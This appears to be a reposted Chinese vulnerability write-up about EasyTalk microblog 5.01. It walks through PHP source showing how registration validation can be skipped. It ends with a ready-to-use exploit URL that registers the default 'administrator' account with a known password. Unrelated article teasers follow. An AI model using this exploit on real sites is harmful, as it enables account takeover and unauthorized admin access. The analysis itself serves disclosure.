EasyTalk微博任意修改账户漏洞漏洞预警 -电脑资料

作者:心灵

漏洞发现在最新版本5.01旧版本没源码不知是否存在

还是那句话..看代码......

看文件目录文件 op.php

<?php

include('common.inc.php');//载入全局变量

$op = $_GET['op']?$_GET['op']:'login';// 因为下面代码的原因所以这不需要过滤

$allowviewarray=array("view","login","register","reset","faq","web","contact","top");

$allop=array("account","badge","faq","finder","follows","login","mailauth","register","reset","sendmsg","setting","share","theme","view","web","feedback","contact","im","top","guide","privatemsg");//这2个不用解析了

if (!in_array($op, $allowviewarray)) {

tologin();//不是$allowviewarray 定义的就跳到验证登录页面

}

if (in_array($op, $allop)) {

require('source/op_'.$op.'.inc.php');

} else {

header("location: $webaddr/op/web/404");

}

?>

这里简单得很看下common.inc.php

主要代码

$prev=$_SERVER['HTTP_REFERER'];

$addtime=time();

$action=$_POST['action'];

$act=$_GET['act'];//问题在这里....配合一下 register里面的代码就可以了

$refer=$_POST['refer']?$_POST['refer']:$_GET['refer'];

$backto=$_POST['backto']?$_POST['backto']:$_GET['backto']; //ajax 回调

$urlrefer=$_COOKIE["urlrefer"];

再看 source\op_register.inc.php

这里就是 op.php?op=register载入的看op.php那文件就知 简单得很..

还是那句 看代码

<?php

....前面是多余代码...省略 主要是检测登录状态

$invitecode=trim($_GET['invitecode']);

$username=daddslashes(trim($_GET['uname']));

$nickname=daddslashes(clean_html(trim($_GET['unick'])));

$mailadres=daddslashes(trim($_GET['mail']));

$pass1=daddslashes(trim($_GET['pass1']));

$pass2=daddslashes(trim($_GET['pass2']));

$deniedname=array("admin","attachments","badge","images","include"."install","source","templates");

//用户名名称EMALL密码1 密码2都做了过滤注入工作...

if ($act=="check") {//主要问题在这里...上面common.inc.php说了act是_GET的 如果act不等于check呢?那就不用检测了..............

if ($closereg==3) {

$invitemsg=invitecodeauth($invitecode);

if ($invitemsg!='ok') {

echo $invitemsg;

exit;

}

}

if(!preg_match("/^[a-zA-Z\d]*$/i",$username)) {

echo "账户名只能使用数字和字母组合!";

exit;

}

if(in_array($username, $deniedname)) {

echo "账户名不能使用!";

//........省略一堆验证注册信息的东西

if ($act=="reg") {//悲剧了....他真以为所有人都按照他脚本的路去走,

EasyTalk微博任意修改账户漏洞漏洞预警

电脑资料

《EasyTalk微博任意修改账户漏洞漏洞预警》()。。。

if ($username &

& $nickname && $mailadres && $pass1==$pass2) { //这文件开头说了都是_GET 里的

$t=$db->query("INSERT INTO et_users (user_name,nickname,password,mailadres,signupdate) VALUES ('$username','$nickname','".md5(md5($pass2))."','$mailadres','$addtime')");

//悲剧悲剧 直接写入数据库了....

//来到这里已经完成整个漏洞过程 下面代码省略

?>

EXP:op.php?op=register&act=reg&uname=administrator&unick=admin&mail=xinling@t00ls.net

&pass1=admin&pass2=admin

administrator是默认管理员账号当然可以修改其他

相关文章

口算除法

口算除法 教学目标 (一)使学生在理解算理的基础上,初步掌握用一位数除两位数、除整百整十数的口算方法,能正确、迅速地进行口算。 (二)培养学生认真口算和检查的良好学习...
资料大全2014-04-07
口算除法

生活垃圾清运实施方案

为了确保事情或工作有效开展,常常需要提前准备一份具体、详细、针对性强的方案,方案的内容和形式都要围绕着主题来展开,最终达到预期的效果和意义。我们应该怎么制定方案呢?下面是小编收集整理的生活垃圾清运实施...
资料大全2015-04-04
生活垃圾清运实施方案

四年级体育上册教学计划

时间真是转瞬即逝,为了以后教学质量不断提高,该好好计划一下接下来的教学工作了!那么一份同事都拍手称赞的教学计划是什么样的呢?以下是小编帮大家整理的人教版四年级体育上册教学计划,仅供参考,欢迎大家阅读。...
资料大全2016-05-07
四年级体育上册教学计划

设计方案

为有力保证事情或工作开展的水平质量,预先制定方案是必不可少的,方案是阐明行动的时间,地点,目的,预期效果,预算及方法等的书面计划。那么应当如何制定方案呢?以下是小编为大家整理的设计方案模板,欢迎大家借...
资料大全2017-09-07
设计方案

趣味户外团队游戏

不管是什么游戏我觉得开心最重要,大家都知道在户外,我们是一个集体,互动起来,显得会更加亲近,趣味户外团队游戏。下面是应届毕业生网小编为大家搜集的趣味户外团队游戏,供大家参考。一、快跑时...
资料大全2017-01-08
趣味户外团队游戏

欢乐颂2女生爱情观

欢乐颂从第一季走到第二季,人物的性格特点都发生了一些微妙的改变,那么她们的爱情观与第一季有什么不同呢?以下是CN人才小编为您收集整理提供到的欢乐颂2女生爱情观的内容,欢迎阅读参考,希望对你有所帮助!欢...
资料大全2014-07-08
欢乐颂2女生爱情观